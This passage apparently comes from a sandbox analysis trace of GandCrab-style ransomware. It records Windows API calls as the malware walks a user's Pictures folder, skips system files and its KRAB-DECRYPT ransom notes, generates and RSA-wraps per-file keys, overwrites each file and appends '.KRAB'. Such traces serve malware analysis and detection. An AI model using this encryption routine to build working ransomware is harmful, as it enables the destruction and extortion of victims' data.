(lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0096.959] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x145df, lpOverlapped=0x0) returned 1 [0096.974] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffeba21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.974] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x145df, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x145df, lpOverlapped=0x0) returned 1 [0096.975] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0096.975] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.979] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.979] CloseHandle (hObject=0x3a8) returned 1 [0096.979] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.980] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\i892iq06tw6n2mnv4x.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\i892iq06tw6n2mnv4x.png.krab")) returned 1 [0096.980] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.981] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.981] lstrcmpW (lpString1="IAKn_V.bmp", lpString2=".") returned 1 [0096.981] lstrcmpW (lpString1="IAKn_V.bmp", lpString2="..") returned 1 [0096.981] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="IAKn_V.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp" [0096.981] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.981] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp.KRAB") returned 54 [0096.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp") returned 49 [0096.981] lstrlenW (lpString=".bmp") returned 4 [0096.981] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.982] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0096.982] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.982] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp") returned 49 [0096.982] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp") returned 49 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="desktop.ini") returned 1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="autorun.inf") returned 1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="ntuser.dat") returned -1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="iconcache.db") returned -1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="bootsect.bak") returned 1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="boot.ini") returned 1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="ntuser.dat.log") returned -1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="thumbs.db") returned -1 [0096.982] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0096.983] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0096.983] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.983] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="ntldr") returned -1 [0096.983] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="NTDETECT.COM") returned -1 [0096.983] lstrcmpiW (lpString1="IAKn_V.bmp", lpString2="Bootfont.bin") returned 1 [0096.983] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.983] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0096.983] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.984] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.984] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.984] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0096.984] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0096.984] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.985] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10114e0) returned 1 [0096.985] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.986] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.986] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.986] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0096.986] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0096.986] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.986] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0096.987] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.987] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.987] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.987] GetLastError () returned 0x0 [0096.987] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.987] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0096.987] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0096.988] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0096.988] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.988] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.988] GetLastError () returned 0x0 [0096.988] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0096.988] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0096.989] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\iakn_v.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0096.989] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0096.989] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0096.990] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x96c7, lpOverlapped=0x0) returned 1 [0097.004] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff6939, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.004] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x96c7, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x96c7, lpOverlapped=0x0) returned 1 [0097.004] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.004] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.008] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.009] CloseHandle (hObject=0x3a8) returned 1 [0097.009] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.009] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\iakn_v.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\IAKn_V.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\iakn_v.bmp.krab")) returned 1 [0097.011] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.011] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.011] lstrcmpW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2=".") returned 1 [0097.011] lstrcmpW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="..") returned 1 [0097.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="JlnNPIoNdeUX9i2NWw.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif" [0097.011] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.012] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif.KRAB") returned 66 [0097.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif") returned 61 [0097.012] lstrlenW (lpString=".gif") returned 4 [0097.012] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.012] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.012] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif") returned 61 [0097.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif") returned 61 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="desktop.ini") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="autorun.inf") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="ntuser.dat") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="iconcache.db") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="bootsect.bak") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="boot.ini") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="ntuser.dat.log") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="thumbs.db") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="ntldr") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="NTDETECT.COM") returned -1 [0097.013] lstrcmpiW (lpString1="JlnNPIoNdeUX9i2NWw.gif", lpString2="Bootfont.bin") returned 1 [0097.013] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.013] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.014] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.014] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.015] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.015] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.015] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.015] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.015] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0097.015] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.016] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.016] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.017] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.017] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.017] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.017] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0097.018] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.018] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.018] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.018] GetLastError () returned 0x0 [0097.018] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.018] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.018] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.019] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.019] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.019] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.019] GetLastError () returned 0x0 [0097.019] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.019] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.019] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\jlnnpiondeux9i2nww.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.020] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.020] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.020] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x7d11, lpOverlapped=0x0) returned 1 [0097.033] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff82ef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.033] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7d11, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x7d11, lpOverlapped=0x0) returned 1 [0097.034] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.034] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.037] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.038] CloseHandle (hObject=0x3a8) returned 1 [0097.038] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.038] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\jlnnpiondeux9i2nww.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\JlnNPIoNdeUX9i2NWw.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\jlnnpiondeux9i2nww.gif.krab")) returned 1 [0097.039] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.047] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.047] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0097.047] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0097.047] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt" [0097.047] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.047] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt.KRAB") returned 60 [0097.047] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt") returned 55 [0097.047] lstrlenW (lpString=".txt") returned 4 [0097.047] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.050] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0097.050] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt") returned 55 [0097.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\KRAB-DECRYPT.txt") returned 55 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0097.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0097.051] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.051] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.051] lstrcmpW (lpString1="LJxOUSvOT.gif", lpString2=".") returned 1 [0097.051] lstrcmpW (lpString1="LJxOUSvOT.gif", lpString2="..") returned 1 [0097.051] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="LJxOUSvOT.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif" [0097.051] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.052] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif.KRAB") returned 57 [0097.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif") returned 52 [0097.052] lstrlenW (lpString=".gif") returned 4 [0097.052] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.052] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.052] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif") returned 52 [0097.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif") returned 52 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="desktop.ini") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="autorun.inf") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="ntuser.dat") returned -1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="iconcache.db") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="bootsect.bak") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="boot.ini") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="ntuser.dat.log") returned -1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="thumbs.db") returned -1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="ntldr") returned -1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="NTDETECT.COM") returned -1 [0097.053] lstrcmpiW (lpString1="LJxOUSvOT.gif", lpString2="Bootfont.bin") returned 1 [0097.053] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.054] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011458) returned 1 [0097.054] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.055] GetModuleHandleA 